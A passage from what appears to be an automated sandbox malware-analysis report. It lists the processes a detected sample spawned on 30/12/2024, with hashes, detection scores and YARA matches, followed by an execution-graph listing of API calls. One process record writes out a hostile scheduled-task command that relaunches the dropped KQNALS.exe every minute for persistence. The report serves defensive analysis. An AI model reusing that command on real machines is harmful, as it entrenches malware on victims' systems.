                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                                                                                                                    Imagebase:0xc50000
                                                                                                                    File size:236'544 bytes
                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff70f010000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:7
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                                                                                                                    Imagebase:0xaf0000
                                                                                                                    File size:187'904 bytes
                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs
                                                                                                                    Imagebase:0x3c0000
                                                                                                                    File size:147'456 bytes
                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000008.00000002.3020785623.0000000003488000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000008.00000002.3022295381.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:9
                                                                                                                    Start time:05:25:15
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 53%, ReversingLabs
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:13
                                                                                                                    Start time:05:25:24
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:15
                                                                                                                    Start time:05:25:32
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:771'584 bytes
                                                                                                                    MD5 hash:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:16
                                                                                                                    Start time:05:25:41
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:17
                                                                                                                    Start time:05:25:50
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:20
                                                                                                                    Start time:05:26:01
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:23
                                                                                                                    Start time:05:26:11
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12448
                                                                                                                    Imagebase:0xe40000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:25
                                                                                                                    Start time:05:26:12
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12508
                                                                                                                    Imagebase:0xe40000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:27
                                                                                                                    Start time:05:26:31
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12500
                                                                                                                    Imagebase:0xe40000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:4.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:10.7%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:40
                                                                                                                      execution_graph 103129 5020b0 103130 5020c0 103129->103130 103131 5021da LoadLibraryA 103130->103131 103134 50221f VirtualProtect VirtualProtect 103130->103134 103132 5021f1 103131->103132 103132->103130 103135 502203 GetProcAddress 103132->103135 103136 502284 103134->103136 103135->103132 103137 502219 ExitProcess 103135->103137 103136->103136 103138 3b1118 103611 3be016 103138->103611 103140 3b112e 103141 3b1148 103140->103141 103142 41abeb 103140->103142 103620 3b3680 103141->103620 103709 3bcf79 49 API calls 103142->103709 103146 41b628 Mailbox 103147 41ac2a 103149 41ac4a Mailbox 103147->103149 103710 3eba5d 48 API calls 103147->103710 103717 3ed520 86 API calls 4 library calls 103149->103717 103151 3b0119 103720 3ed520 86 API calls 4 library calls 103151->103720 103152 3b105e 103711 3ac935 103152->103711 103154 3b0dee 103691 3ad89e 103154->103691 103156 3c010a 48 API calls 103184 3afad8 Mailbox _memmove 103156->103184 103157 3b0dfa 103164 3ad89e 50 API calls 103157->103164 103158 41b772 103721 3ed520 86 API calls 4 library calls 103158->103721 103163 3ac935 48 API calls 103163->103184 103165 3b0e83 103164->103165 103701 3acaee 103165->103701 103166 3b1063 103719 3ed520 86 API calls 4 library calls 103166->103719 103167 3ad3d2 48 API calls 103167->103184 103169 41b7d2 103170 3c1b2a 52 API calls __cinit 103170->103184 103175 3afbf1 Mailbox 103176 3b1230 103176->103175 103718 3ed520 86 API calls 4 library calls 103176->103718 103180 3da599 InterlockedDecrement 103180->103184 103181 41b583 103715 3ed520 86 API calls 4 library calls 103181->103715 103183 3b10f1 Mailbox 103716 3ed520 86 API calls 4 library calls 103183->103716 103184->103151 103184->103152 103184->103154 103184->103156 103184->103157 103184->103158 103184->103163 103184->103165 103184->103166 103184->103167 103184->103170 103184->103175 103184->103176 103184->103180 103184->103181 103184->103183 103202 3af6d0 103184->103202 103274 3afa40 103184->103274 103329 3f013f 103184->103329 103342 3bef0d 103184->103342 103385 40798d 103184->103385 103390 3fb74b VariantInit 103184->103390 103431 401f19 103184->103431 103434 3bf03e 103184->103434 103437 3a50a3 103184->103437 103442 3bf461 103184->103442 103480 400bfa 103184->103480 103483 3f9122 103184->103483 103497 4010e5 103184->103497 103503 4030ad 103184->103503 103557 3f8065 GetCursorPos GetForegroundWindow 103184->103557 103571 3bdd84 103184->103571 103574 3f92c0 103184->103574 103592 4017aa 103184->103592 103597 40804e 103184->103597 103690 3b1620 59 API calls Mailbox 103184->103690 103705 3fee52 82 API calls 2 library calls 103184->103705 103706 3fef9d 90 API calls Mailbox 103184->103706 103707 3eb020 48 API calls 103184->103707 103708 3fe713 413 API calls Mailbox 103184->103708 103203 3af708 103202->103203 103207 3af77b 103202->103207 103204 41c4d5 103203->103204 103205 3af712 103203->103205 103210 41c4e2 103204->103210 103211 41c4f4 103204->103211 103206 3af71c 103205->103206 103223 41c544 103205->103223 103216 41c6a4 103206->103216 103220 3af72a 103206->103220 103269 3af741 103206->103269 103209 41c253 103207->103209 103248 3af787 103207->103248 103208 3afa40 413 API calls 103208->103248 103761 3ed520 86 API calls 4 library calls 103209->103761 103722 3ff34f 103210->103722 103766 3fc235 413 API calls Mailbox 103211->103766 103212 41c585 103224 41c590 103212->103224 103225 41c5a4 103212->103225 103219 3ac935 48 API calls 103216->103219 103217 41c264 103217->103184 103218 41c507 103222 41c50b 103218->103222 103218->103269 103219->103269 103220->103269 103798 3da599 InterlockedDecrement 103220->103798 103767 3ed520 86 API calls 4 library calls 103222->103767 103223->103212 103235 41c569 103223->103235 103227 3ff34f 413 API calls 103224->103227 103769 3fd154 48 API calls 103225->103769 103227->103269 103229 3c2241 48 API calls 103229->103248 103230 41c45a 103234 3ac935 48 API calls 103230->103234 103232 41c7b5 103239 41c7eb 103232->103239 103820 3fef9d 90 API calls Mailbox 103232->103820 103233 41c5af 103247 41c62c 103233->103247 103258 41c5d1 103233->103258 103234->103269 103768 3ed520 86 API calls 4 library calls 103235->103768 103236 3af84a 103242 41c32a 103236->103242 103253 3af854 103236->103253 103240 3ad89e 50 API calls 103239->103240 103271 3af770 Mailbox 103240->103271 103762 3a342c 48 API calls 103242->103762 103243 41c793 103800 3a84a6 103243->103800 103795 3eafce 48 API calls 103247->103795 103248->103208 103248->103229 103248->103236 103250 3af8bb 103248->103250 103257 3af9d8 103248->103257 103248->103271 103249 41c7c9 103252 3a84a6 81 API calls 103249->103252 103250->103217 103250->103230 103250->103269 103763 3da599 InterlockedDecrement 103250->103763 103765 3ff4df 413 API calls 103250->103765 103261 41c7d1 __NMSG_WRITE 103252->103261 103745 3b14a0 103253->103745 103255 3af8ab 103255->103250 103255->103257 103764 3ed520 86 API calls 4 library calls 103257->103764 103770 3ea485 48 API calls 103258->103770 103259 41c63e 103796 3bdf08 48 API calls 103259->103796 103260 41c79b __NMSG_WRITE 103260->103232 103263 3ad89e 50 API calls 103260->103263 103261->103239 103265 3ad89e 50 API calls 103261->103265 103263->103232 103265->103239 103266 41c647 Mailbox 103797 3ea485 48 API calls 103266->103797 103267 41c5f6 103771 3b44e0 103267->103771 103269->103232 103269->103271 103799 3fee52 82 API calls 2 library calls 103269->103799 103271->103184 103272 41c663 103273 3b3680 413 API calls 103272->103273 103273->103269 103275 3afa60 103274->103275 103311 3afa8e Mailbox _memmove 103274->103311 103276 3c010a 48 API calls 103275->103276 103276->103311 103277 3b105e 103278 3ac935 48 API calls 103277->103278 103303 3afbf1 Mailbox 103278->103303 103279 3ad3d2 48 API calls 103279->103311 103280 3b0119 104713 3ed520 86 API calls 4 library calls 103280->104713 103283 3b0dee 103289 3ad89e 50 API calls 103283->103289 103285 3c010a 48 API calls 103285->103311 103286 3b1063 104712 3ed520 86 API calls 4 library calls 103286->104712 103287 3b0dfa 103292 3ad89e 50 API calls 103287->103292 103288 41b772 104714 3ed520 86 API calls 4 library calls 103288->104714 103289->103287 103291 3ac935 48 API calls 103291->103311 103294 3b0e83 103292->103294 103293 3af6d0 413 API calls 103293->103311 103298 3acaee 48 API calls 103294->103298 103296 41b7d2 103297 3c1b2a 52 API calls __cinit 103297->103311 103306 3b10f1 Mailbox 103298->103306 103300 3b1230 103300->103303 104711 3ed520 86 API calls 4 library calls 103300->104711 103303->103184 103304 3afa40 413 API calls 103304->103311 104710 3ed520 86 API calls 4 library calls 103306->104710 103308 41b583 104709 3ed520 86 API calls 4 library calls 103308->104709 103310 3da599 InterlockedDecrement 103310->103311 103311->103277 103311->103279 103311->103280 103311->103283 103311->103285 103311->103286 103311->103287 103311->103288 103311->103291 103311->103293 103311->103294 103311->103297 103311->103300 103311->103303 103311->103304 103311->103306 103311->103308 103311->103310 103312 3f013f 87 API calls 103311->103312 103313 4010e5 82 API calls 103311->103313 103314 3bf03e 2 API calls 103311->103314 103315 4017aa 87 API calls 103311->103315 103316 4030ad 93 API calls 103311->103316 103317 40798d 109 API calls 103311->103317 103318 40804e 111 API calls 103311->103318 103319 3fb74b 413 API calls 103311->103319 103320 3bef0d 94 API calls 103311->103320 103321 3a50a3 49 API calls 103311->103321 103322 401f19 132 API calls 103311->103322 103323 400bfa 129 API calls 103311->103323 103324 3bf461 98 API calls 103311->103324 103325 3f8065 55 API calls 103311->103325 103326 3f9122 91 API calls 103311->103326 103327 3f92c0 88 API calls 103311->103327 103328 3bdd84 3 API calls 103311->103328 104704 3b1620 59 API calls Mailbox 103311->104704 104705 3fee52 82 API calls 2 library calls 103311->104705 104706 3fef9d 90 API calls Mailbox 103311->104706 104707 3eb020 48 API calls 103311->104707 104708 3fe713 413 API calls Mailbox 103311->104708 103312->103311 103313->103311 103314->103311 103315->103311 103316->103311 103317->103311 103318->103311 103319->103311 103320->103311 103321->103311 103322->103311 103323->103311 103324->103311 103325->103311 103326->103311 103327->103311 103328->103311 103330 3f015e 103329->103330 103331 3f0157 103329->103331 103332 3a84a6 81 API calls 103330->103332 103333 3a84a6 81 API calls 103331->103333 103332->103331 103334 3f017c 103333->103334 104715 3e76db GetFileVersionInfoSizeW 103334->104715 103336 3f018d 103337 3f0192 103336->103337 103339 3f01a3 _wcscmp 103336->103339 103338 3aca8e 48 API calls 103337->103338 103341 3f01a1 103338->103341 103340 3aca8e 48 API calls 103339->103340 103340->103341 103341->103184 103343 3aca8e 48 API calls 103342->103343 103344 3bef25 103343->103344 103345 3beffb 103344->103345 103346 3bef3e 103344->103346 103347 3c010a 48 API calls 103345->103347 104760 3bf0f3 48 API calls 103346->104760 103349 3bf002 103347->103349 103350 3bf00e 103349->103350 104762 3a5080 49 API calls 103349->104762 103354 3a84a6 81 API calls 103350->103354 103352 3bef73 103355 3bf03e 2 API calls 103352->103355 103353 3bef4d 103353->103352 103356 416942 103353->103356 103357 3acdb4 48 API calls 103353->103357 103358 3bf01c 103354->103358 103359 3bef7a 103355->103359 103356->103184 103360 416965 103357->103360 103361 3a4bf9 56 API calls 103358->103361 103363 416980 103359->103363 103364 3bef87 103359->103364 103360->103352 103365 41696d 103360->103365 103362 3bf02b 103361->103362 103362->103353 103366 416936 103362->103366 103367 3c010a 48 API calls 103363->103367 103368 3ad3d2 48 API calls 103364->103368 103369 3acdb4 48 API calls 103365->103369 103366->103356 104763 3a4592 CloseHandle 103366->104763 103370 416986 103367->103370 103371 3bef8f 103368->103371 103369->103359 103372 41699f 103370->103372 104764 3a3d65 ReadFile SetFilePointerEx 103370->104764 104731 3bf04e 103371->104731 103379 4169a3 _memmove 103372->103379 104765 3ead14 48 API calls _memset 103372->104765 103376 3bef9e 103376->103379 104754 3a7bef 103376->104754 103380 3befb2 Mailbox 103381 3beff2 103380->103381 103382 3a50ec CloseHandle 103380->103382 103381->103184 103383 3befe4 103382->103383 104761 3a4592 CloseHandle 103383->104761 104808 3a19ee 103385->104808 103389 4079a4 103389->103184 103391 3aca8e 48 API calls 103390->103391 103392 3fb7a3 CoInitialize 103391->103392 103393 3fb7ae CoUninitialize 103392->103393 103394 3fb7b4 103392->103394 103393->103394 103395 3fb7d5 103394->103395 103396 3aca8e 48 API calls 103394->103396 103397 3fb81b 103395->103397 103399 3a84a6 81 API calls 103395->103399 103396->103395 103398 3a84a6 81 API calls 103397->103398 103400 3fb827 103398->103400 103401 3fb7ef 103399->103401 103405 3fb9d3 SetErrorMode CoGetInstanceFromFile 103400->103405 103420 3fb861 103400->103420 104932 3da857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 103401->104932 103403 3fb802 103403->103397 103404 3fb807 103403->103404 104933 3fc235 413 API calls Mailbox 103404->104933 103408 3fba1f CoGetObject 103405->103408 103409 3fba19 SetErrorMode 103405->103409 103407 3fb8a8 GetRunningObjectTable 103410 3fb8b8 103407->103410 103411 3fb8cb 103407->103411 103408->103409 103413 3fbaa8 103408->103413 103428 3fb9b1 103409->103428 103410->103411 103429 3fb8ed 103410->103429 104934 3fc235 413 API calls Mailbox 103411->104934 104938 3fc235 413 API calls Mailbox 103413->104938 103415 3fbad0 VariantClear 103415->103184 103417 3fbac2 SetErrorMode 103419 3fb814 Mailbox 103417->103419 103418 3fba53 103422 3fba6f 103418->103422 104936 3dac4b 51 API calls Mailbox 103418->104936 103419->103415 103420->103407 103421 3fb89a 103420->103421 103423 3acdb4 48 API calls 103420->103423 103421->103407 104937 3ea6f6 103 API calls 103422->104937 103426 3fb88a 103423->103426 103426->103421 103427 3acdb4 48 API calls 103426->103427 103427->103421 103428->103413 103428->103418 103429->103428 104935 3dac4b 51 API calls Mailbox 103429->104935 104939 4023c5 103431->104939 103435 3bf0b5 2 API calls 103434->103435 103436 3bf046 103435->103436 103436->103184 103438 3c010a 48 API calls 103437->103438 103439 3a50b3 103438->103439 103440 3a50ec CloseHandle 103439->103440 103441 3a50be 103440->103441 103441->103184 103443 3bf47f 103442->103443 103444 3bf48a 103442->103444 103445 3acdb4 48 API calls 103443->103445 103447 3a84a6 81 API calls 103444->103447 103477 3bf498 Mailbox 103444->103477 103445->103444 103446 3c010a 48 API calls 103448 3bf49f 103446->103448 103449 416841 103447->103449 103450 3bf4af 103448->103450 105023 3a5080 49 API calls 103448->105023 103451 3c297d __wsplitpath 47 API calls 103449->103451 103453 3a84a6 81 API calls 103450->103453 103454 416859 103451->103454 103455 3bf4bf 103453->103455 103456 3acaee 48 API calls 103454->103456 103457 3a4bf9 56 API calls 103455->103457 103458 41686a 103456->103458 103459 3bf4ce 103457->103459 105024 3a39e8 48 API calls 2 library calls 103458->105024 103461 4168d4 GetLastError 103459->103461 103462 3bf4d6 103459->103462 103471 4168ed 103461->103471 103465 416920 103462->103465 103466 3bf4f0 103462->103466 103463 416878 103478 416895 103463->103478 105025 3e6f4b GetFileAttributesW FindFirstFileW FindClose 103463->105025 103464 3acdb4 48 API calls 103464->103477 103469 3c010a 48 API calls 103465->103469 103468 3c010a 48 API calls 103466->103468 103473 3bf4f5 103468->103473 103474 416925 103469->103474 103470 416888 103476 3e6d6d 52 API calls 103470->103476 103470->103478 103471->103462 105026 3a4592 CloseHandle 103471->105026 103475 3a197e 48 API calls 103473->103475 103479 3bf50a Mailbox 103475->103479 103476->103478 103477->103446 103477->103479 103478->103464 103479->103184 105027 3ff79f 103480->105027 103482 400c0a 103482->103184 103484 3a84a6 81 API calls 103483->103484 103485 3f913f 103484->103485 103486 3acdb4 48 API calls 103485->103486 103487 3f9149 103486->103487 105115 3facd3 103487->105115 103489 3f9156 103490 3f915a socket 103489->103490 103494 3f9182 103489->103494 103491 3f916d WSAGetLastError 103490->103491 103492 3f9184 connect 103490->103492 103491->103494 103493 3f91a3 WSAGetLastError 103492->103493 103492->103494 105121 3ed7e4 103493->105121 103494->103184 103496 3f91b8 closesocket 103496->103494 103498 3a84a6 81 API calls 103497->103498 103499 4010fb LoadLibraryW 103498->103499 103500 40111e 103499->103500 103501 40110f 103499->103501 103500->103501 105136 4028d9 48 API calls _memmove 103500->105136 103501->103184 103504 3aca8e 48 API calls 103503->103504 103505 4030ca 103504->103505 103506 3ad3d2 48 API calls 103505->103506 103507 4030d3 103506->103507 103508 3ad3d2 48 API calls 103507->103508 103509 4030dc 103508->103509 103510 3ad3d2 48 API calls 103509->103510 103511 4030e5 103510->103511 103512 3a84a6 81 API calls 103511->103512 103513 4030f4 103512->103513 103514 403d7b 48 API calls 103513->103514 103515 403128 103514->103515 103516 403af7 49 API calls 103515->103516 103517 403159 103516->103517 103518 40319c RegOpenKeyExW 103517->103518 103519 403172 RegConnectRegistryW 103517->103519 103526 40315d Mailbox 103517->103526 103521 4031c5 103518->103521 103522 4031f7 103518->103522 103519->103518 103519->103526 103525 4031d9 RegCloseKey 103521->103525 103521->103526 103523 3a84a6 81 API calls 103522->103523 103524 403207 RegQueryValueExW 103523->103524 103527 403229 103524->103527 103528 40323e 103524->103528 103525->103526 103526->103184 103532 4034eb RegCloseKey 103527->103532 103528->103527 103529 403265 103528->103529 103530 40344c 103528->103530 103533 4033d9 103529->103533 103534 40326e 103529->103534 103531 3c010a 48 API calls 103530->103531 103537 403464 103531->103537 103532->103526 103538 4034fe RegCloseKey 103532->103538 105137 3ead14 48 API calls _memset 103533->105137 103535 403279 103534->103535 103536 40338d 103534->103536 103540 4032de 103535->103540 103541 40327e 103535->103541 103542 3a84a6 81 API calls 103536->103542 103543 3a84a6 81 API calls 103537->103543 103538->103526 103546 3c010a 48 API calls 103540->103546 103541->103527 103549 3a84a6 81 API calls 103541->103549 103545 4033a1 RegQueryValueExW 103542->103545 103547 403479 RegQueryValueExW 103543->103547 103544 4033e4 103548 3a84a6 81 API calls 103544->103548 103545->103527 103550 4032f7 103546->103550 103547->103527 103556 403331 103547->103556 103551 4033f6 RegQueryValueExW 103548->103551 103552 40329f RegQueryValueExW 103549->103552 103553 3a84a6 81 API calls 103550->103553 103551->103527 103551->103532 103552->103527 103554 40330c RegQueryValueExW 103553->103554 103554->103527 103554->103556 103555 3aca8e 48 API calls 103555->103527 103556->103555 105138 3f6b19 103557->105138 103560 3f80a5 103561 3a3320 48 API calls 103560->103561 103562 3f80b3 103561->103562 105143 3b2320 50 API calls 103562->105143 103563 3f8102 103565 3acdb4 48 API calls 103563->103565 103570 3f80f5 103563->103570 103567 3f812b 103565->103567 103566 3f80cf 105144 3b2320 50 API calls 103566->105144 103569 3acdb4 48 API calls 103567->103569 103567->103570 103569->103570 103570->103184 105145 3bdd92 GetFileAttributesW 103571->105145 103575 3aa6d4 48 API calls 103574->103575 103576 3f92d2 103575->103576 103577 3a84a6 81 API calls 103576->103577 103578 3f92e1 103577->103578 103579 3bf26b 50 API calls 103578->103579 103580 3f92ed gethostbyname 103579->103580 103581 3f931d _memmove 103580->103581 103582 3f92fa WSAGetLastError 103580->103582 103584 3f932d inet_ntoa 103581->103584 103583 3f930e 103582->103583 103585 3aca8e 48 API calls 103583->103585 105150 3fadca 48 API calls 2 library calls 103584->105150 103591 3f931b Mailbox 103585->103591 103587 3f9342 105151 3fae5a 50 API calls 103587->105151 103589 3f934e 103590 3a7bef 48 API calls 103589->103590 103590->103591 103591->103184 103593 3a84a6 81 API calls 103592->103593 103594 4017c7 103593->103594 103595 3e6f5b 63 API calls 103594->103595 103596 4017d8 103595->103596 103596->103184 103598 3a19ee 83 API calls 103597->103598 103599 408062 103598->103599 103600 3a1dce 107 API calls 103599->103600 103601 40806b 103600->103601 103602 408091 103601->103602 103603 40806f 103601->103603 103604 3ad3d2 48 API calls 103602->103604 103606 3aca8e 48 API calls 103603->103606 103605 40809a 103604->103605 105152 3de2e8 103605->105152 103610 40808f Mailbox 103606->103610 103608 4080aa 103609 3a7bef 48 API calls 103608->103609 103609->103610 103610->103184 103612 3be022 103611->103612 103613 3be034 103611->103613 103614 3ad89e 50 API calls 103612->103614 103615 3be03a 103613->103615 103616 3be063 103613->103616 103619 3be02c 103614->103619 103618 3c010a 48 API calls 103615->103618 103617 3ad89e 50 API calls 103616->103617 103617->103619 103618->103619 103619->103140 105174 3aa9a0 103620->105174 103622 3b36e7 103623 3b3778 103622->103623 103624 41a269 103622->103624 103682 3b3aa8 103622->103682 105186 3bbc04 86 API calls 103623->105186 105191 3ed520 86 API calls 4 library calls 103624->105191 103628 41a68d 103628->103682 105212 3ed520 86 API calls 4 library calls 103628->105212 103629 3b3793 103629->103628 103680 3b396b Mailbox _memmove 103629->103680 103629->103682 105179 3a10e8 103629->105179 103634 41a289 103678 41a3e9 103634->103678 105192 3ad2d2 103634->105192 103635 41a583 103639 3afa40 413 API calls 103635->103639 103636 41a45c 105206 3ed520 86 API calls 4 library calls 103636->105206 103640 41a5b5 103639->103640 103647 3ad380 55 API calls 103640->103647 103640->103682 103643 41a303 103657 41a317 103643->103657 103666 41a341 103643->103666 103644 41a40f 105203 3bcf79 49 API calls 103644->105203 103646 3b384e 103650 41a60c 103646->103650 103651 3b38e5 103646->103651 103646->103680 103653 41a5e6 103647->103653 105211 3ed231 50 API calls 103650->105211 103658 3c010a 48 API calls 103651->103658 105210 3ed520 86 API calls 4 library calls 103653->105210 103654 3afa40 413 API calls 103654->103680 103656 41a42c 103660 41a441 103656->103660 103661 41a44d 103656->103661 105198 3ed520 86 API calls 4 library calls 103657->105198 103669 3b38ec 103658->103669 103659 3bbc5c 48 API calls 103659->103680 105204 3ed520 86 API calls 4 library calls 103660->105204 105205 3ed520 86 API calls 4 library calls 103661->105205 103667 41a366 103666->103667 103672 41a384 103666->103672 105199 3ff211 413 API calls 103667->105199 103668 3ad89e 50 API calls 103668->103680 103675 3ae1f0 413 API calls 103669->103675 103677 3b399f 103669->103677 103671 3c010a 48 API calls 103671->103680 103673 41a37a 103672->103673 105200 3ff4df 413 API calls 103672->105200 103673->103682 105201 3bbaef 48 API calls _memmove 103673->105201 103675->103680 103679 3ac935 48 API calls 103677->103679 103681 3b39c0 103677->103681 105202 3ed520 86 API calls 4 library calls 103678->105202 103679->103681 103680->103634 103680->103635 103680->103636 103680->103653 103680->103654 103680->103659 103680->103668 103680->103671 103680->103677 103680->103682 105187 3ad500 53 API calls __cinit 103680->105187 105188 3ad420 53 API calls 103680->105188 105189 3bbaef 48 API calls _memmove 103680->105189 